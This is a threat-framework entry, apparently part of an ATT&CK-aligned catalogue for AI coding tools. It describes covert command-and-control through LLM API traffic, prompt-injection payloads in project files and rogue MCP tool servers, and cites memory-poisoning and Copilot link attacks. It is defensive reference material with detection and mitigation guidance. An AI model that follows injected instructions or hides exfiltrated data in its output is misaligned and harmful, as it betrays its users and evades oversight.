AIDE-017 Exfiltration Coverage C ATT&CK Aligned Command and Control

LLM API Traffic as Covert C2 Channel

AIDE-017 | ATT&CK: T1071.001

Description

Adversary Behavior: An adversary uses the regular API communication between the LLM-integrated IDE and its backend model service as a covert command-and-control channel, embedding C2 instructions within prompt injection payloads and encoding responses in the LLM's generated output.

AI/IDE Mechanism: LLM API traffic is expected, high-volume, encrypted (TLS), and variable in content — making it resistant to signature-based detection. The bidirectional communication channel between the IDE and the LLM service provides a natural carrier for covert data transmission. Additionally, MCP tool server connections provide supplementary C2 relay points.

Execution Path: C2 instructions are embedded within prompt injection payloads in project files or documentation that the LLM ingests as context. Responses carrying exfiltrated data or command acknowledgments are encoded within the LLM's generated code output, tool invocation parameters, or telemetry data. Alternatively, adversaries register malicious MCP tool servers that function as C2 relay points, receiving tasking through tool invocations and returning instructions disguised as tool responses.

Security Impact: The adversary establishes a covert C2 channel that is extremely difficult to detect because it operates within the expected LLM API communication patterns. Traditional network-based C2 detection is ineffective against traffic that is indistinguishable from legitimate AI-assisted development operations.

Platforms

Windows macOS Linux

Detection

Baseline normal LLM API traffic patterns (request frequency, payload sizes, destination endpoints) and alert on deviations. Monitor MCP tool server registrations and validate that registered endpoints match approved tool providers. Inspect LLM-generated output for encoded data patterns that differ from expected code generation. Implement egress filtering that restricts LLM API traffic to known, approved model service endpoints. Analyze tool invocation logs for MCP servers exhibiting bidirectional command-response patterns inconsistent with their declared function.

Detecting Data Components (3)

Server Registration

Events capturing the registration or discovery of MCP tool servers by the IDE.

Response Content

Full text of LLM responses including generated code, explanations, and tool call requests.

Token Metadata

Metadata about inference requests including token counts, model selection, latency, and processing parameters.

Mitigations (3)

AI Network Traffic Segmentation

Implement egress filtering restricting LLM API and MCP tool server traffic to approved endpoints. Baseline normal LLM API traffic patterns and alert on deviations. Restrict agent-initiated outbound connections to pre-approved destinations.

MCP Server Allowlisting and Verification

Maintain an approved inventory of MCP tool servers. Require signature verification for server registration. Validate that registered endpoints match approved providers. Alert on new server registrations from project-level configuration.

LLM Output Validation and Encoding Detection

Scan LLM-generated output for encoded data patterns (base64, URL encoding), embedded URLs, and content that diverges from the prompt intent. Implement output content policies that block exfiltration patterns in generated code, markdown rendering, and tool invocations.

Data Sources

Network Traffic → Network Traffic Content

Network Traffic → Network Traffic Flow

Application Log → Application Log Content

Command → Command Execution

References

mitre-attack

Maps to Application Layer Protocol: Web Protocols. Coverage Level C — existing technique covers HTTP/S-based C2 but lacks guidance for LLM API traffic as covert channel and MCP servers as C2 relay.

https://attack.mitre.org/techniques/T1071/001

WhiteRabbitNeo LLM-Based C2 Research

Research demonstrating use of LLM API communication patterns for covert command and control

https://www.whiterabbitneo.com

ChatGPT ZombAI C2 (Rehberger, Oct 2024, Black Hat Europe)

First promptware-native C2 — ChatGPT memory poisoned to fetch dynamic commands from GitHub issues, enabling remote control of compromised instances.

https://embracethered.com/blog/

Reprompt Attack (Varonis, Jan 2026)

One-click Copilot link enabled session-scoped persistence with chain-request C2 mechanism for continuous silent data exfiltration.

https://www.varonis.com/blog/reprompt-attack

STIX Metadata

type	attack-pattern
id	attack-pattern--5070000b-d354-4231-a84d-ae3c2e0909c3
spec_version	2.1
created	2026-02-23T00:00:00.000Z
modified	2026-02-23T00:00:00.000Z
created_by_ref	identity--f5b5ec62-ffbd-4afd-9ee5-7c648406e189
x_mitre_is_subtechnique	False
x_mitre_version	0.1
x_mitre_status	mapped